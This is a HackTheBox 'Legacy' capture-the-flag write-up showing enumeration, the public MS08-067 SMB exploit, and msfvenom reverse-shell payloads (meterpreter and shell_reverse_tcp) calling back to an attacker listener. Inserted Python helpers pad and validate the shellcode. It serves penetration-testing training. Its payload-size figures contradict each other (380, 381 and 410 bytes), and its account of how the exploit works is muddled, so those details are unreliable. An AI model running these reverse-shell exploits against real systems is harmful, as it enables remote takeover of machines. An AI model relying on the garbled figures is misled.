Legacy Hackthebox

A step-by-step breakdown of Julio Ureña's YouTube video HackTheBox - Legacy. This Windows box involves enumerating the system down to an exploitable SMB service, then modifying a public exploit and inserting custom shellcode generated with msfvenom, both meterpreter and shell_reverse_tcp.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting techniques and help solidify the understanding and methodologies used during penetration testing.

Enumeration

Quick Masscan Script (run as root, since masscan needs raw socket access):

#!/bin/bash

# syntax: ./masscan.sh [targetip]
target="$1"
if [ -z "$target" ]; then
    echo "usage: $0 [targetip]"
    exit 1
fi

echo "Starting TCP Masscan"
masscan -p1-65535 --rate 500 -e tun0 "$target" > masscan-tcp.all
echo

echo "**** Display Results ****"
echo "****       TCP       ****"
# masscan result lines look like: Discovered open port 445/tcp on 10.10.10.4
grep tcp masscan-tcp.all | cut -d '/' -f 1 | cut -d' ' -f 4
echo

echo "Starting UDP Masscan"
masscan -pU:1-65535 --rate 500 -e tun0 "$target" > masscan-udp.all
echo

echo "**** UDP ****"
grep udp masscan-udp.all | cut -d '/' -f 1 | cut -d' ' -f 4
echo

# follow up with default scripts and version detection on the same target
mkdir -p nmap
nmap -sC -sV -oA nmap/legacy "$target"
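The cut pipeline in the script above is fragile (it depends on the exact word positions in masscan's output). As an added example, not part of the original write-up or Julio's video, here is a small Python parser for the same masscan output format that collects unique ports per host and protocol and turns them into an argument for a targeted nmap follow-up. The sample output is constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample in masscan's default stdout format, as captured by
# "masscan ... > masscan-tcp.all" in the wrapper script (duplicate line included
# on purpose: masscan can report the same port more than once).
SAMPLE_OUTPUT = """\
Discovered open port 445/tcp on 10.10.10.4
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Discovered open port 137/udp on 10.10.10.4
some unrelated line that should be ignored
"""

LINE_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)")


def parse_masscan(text):
    """Return {host: {proto: sorted unique port list}} from masscan output text."""
    hosts = defaultdict(lambda: defaultdict(set))
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip anything that is not a discovery line
        port, proto, host = m.groups()
        hosts[host][proto].add(int(port))
    return {h: {p: sorted(ports) for p, ports in protos.items()} for h, protos in hosts.items()}


def nmap_port_arg(ports):
    """Comma-separated list suitable for `nmap -p`, so the follow-up only touches discovered ports."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for host, protos in parse_masscan(SAMPLE_OUTPUT).items():
        for proto, ports in protos.items():
            print(f"{host} {proto}: {nmap_port_arg(ports)}")
```

With a real file you would read `masscan-tcp.all` and `masscan-udp.all` and pass their contents to `parse_masscan`, then use `nmap_port_arg` to build the `-p` list for `nmap -sC -sV`.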

(results)

From the results we know we are dealing with a Windows XP box, so next we run the SMB vulnerability NSE scripts against the SMB ports:

nmap --script "smb-vuln*" -p139,445 -oN nmap-smb-vuln.txt 10.10.10.4

The scan reports the SMB service as vulnerable.

MS08-067 exploit

Based on the Exploit Database entry: https://www.exploit-db.com/exploits/40279

The exploit in a nutshell:

We take over execution through SHELL32.DLL and NTDLL.DLL, which are reachable via an overflow, and inject our own shellcode generated with msfvenom so the target connects back to our listener.

Creating msfvenom (meterpreter) shellcode

# LPORT must match the port the multi/handler listens on (443 below)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.248 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

-v names the variable in the generated output (here `shellcode`).

The exploit's instructions state that the shellcode must be 380 bytes, and this payload comes out at exactly 380 bytes.

Creating msfvenom (shell_reverse_tcp) shellcode

# LPORT must match the port the multi/handler listens on (443 below)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.248 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

This payload is 348 bytes, so we need to fill the remaining space (32 bytes) with NOPs (\x90).

Adding the NOPs via msfvenom:

# -n 32 adds a 32-byte NOP sled to the payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.248 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -n 32

32 bytes of NOPs have been added to the final shellcode.

Setting up the Metasploit listener

msfdb run   # launches postgres as well
msfconsole  # normal launch

use multi/handler
set payload windows/meterpreter/reverse_tcp
options

# LHOST and LPORT must match the values baked into the msfvenom payload
set LHOST 10.10.15.248
set LPORT 443
run

Download the exploit locally

wget http://www.exploit-db.com/download/40279.py -O MS08-067.py

Edit the shellcode section of MS08-067.py:

Calculate the byte length of the shellcode with Python.

Open Python:

python

Enter the shellcode variable and check its length:

shellcode = ""
(paste shellcode)
len(shellcode)

Without the NOPs we have a value of 380 bytes.

Paste the generated shellcode into the exploit

Add the generated shellcode into the exploit and remove one \x90 NOP, as our original msfvenom output came to 381 bytes.

Quick test of the length with Python:

410 bytes was the exact number of bytes in the original shellcode.
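The two constraints in the padding and length-check steps above (the payload must avoid the bytes passed to `-b`, and it must come out at exactly the size the exploit reserves) are easy to get wrong by hand, and a mistake here is what crashes the target instead of returning a shell. As an added example, not part of the original write-up, the exploit, or Julio's video, here is a Python helper that checks a payload against both constraints and pads it with a leading NOP sled, which is what `msfvenom -n` does. The 380-byte size is the figure quoted above; the sample input is a constructed byte string that stands in for a 348-byte payload and is not shellcode.

```python
# Same bad-character list passed to msfvenom -b in the commands above.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"
REQUIRED_LEN = 380   # size the exploit's instructions call for
NOP = b"\x90"


def find_badchars(buf, badchars=BADCHARS):
    """Return the sorted list of forbidden byte values present in buf (empty if clean)."""
    return sorted({b for b in buf if b in badchars})


def fit_shellcode(buf, required=REQUIRED_LEN, badchars=BADCHARS):
    """Validate buf and pad it with a leading NOP sled up to `required` bytes.

    Raises ValueError instead of silently producing a payload that would crash
    the target: a bad character corrupts the payload in transit, and an
    oversized payload overruns the space the exploit reserves for it.
    """
    bad = find_badchars(buf, badchars)
    if bad:
        raise ValueError("payload contains bad characters: " + ", ".join(f"0x{b:02x}" for b in bad))
    if len(buf) > required:
        raise ValueError(f"payload is {len(buf)} bytes, {len(buf) - required} over the {required}-byte limit")
    return NOP * (required - len(buf)) + buf


def to_python_literal(buf, name="shellcode", width=16):
    """Render buf in the `name += b"\\x.."` form that `msfvenom -f python -v name` emits."""
    lines = [f'{name} = b""']
    for i in range(0, len(buf), width):
        chunk = "".join(f"\\x{b:02x}" for b in buf[i:i + width])
        lines.append(f'{name} += b"{chunk}"')
    return "\n".join(lines)


# Constructed stand-in for a 348-byte shell_reverse_tcp payload: NOT shellcode,
# just byte values chosen so none of them is in the bad-character list.
SAMPLE_348 = bytes(range(1, 9)) * 43 + b"\x01\x02\x03\x04"

if __name__ == "__main__":
    padded = fit_shellcode(SAMPLE_348)
    print(f"input {len(SAMPLE_348)} bytes -> padded {len(padded)} bytes")
    print(to_python_literal(padded)[:120] + " ...")
```

To use it on a real msfvenom output, paste the generated `shellcode` variable into the script (as `bytes`, since this helper is written for Python 3), call `fit_shellcode` on it, and paste the result of `to_python_literal` into the exploit; the 380-byte meterpreter payload passes through unchanged, and the 348-byte shell_reverse_tcp payload gains the 32-byte sled.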

Enumerating the OS type with nmap

nmap -O 10.10.10.4

We already enumerated that the system is Windows XP, but verify it before launching the exploit. This is needed because if we send the wrong set of exploit data to the target we could crash it.

Exploiting

We are going to use option "7", "Windows XP SP3 English (AlwaysON NX)", based on the exploit's target list.

Testing functionality

Run the script with no arguments to confirm it runs:

python MS08-067.py

It runs.

Send the exploit

python MS08-067.py 10.10.10.4 7

The listener returns a session.

Root & Loot

In meterpreter, send getuid:

NT AUTHORITY\SYSTEM!


If you want to learn Spanish and pentesting at the same time, I recommend checking out Julio's YouTube page. Link: https://www.youtube.com/channel/UC2o1vzpUIvgf0VMJIMKZ_rQ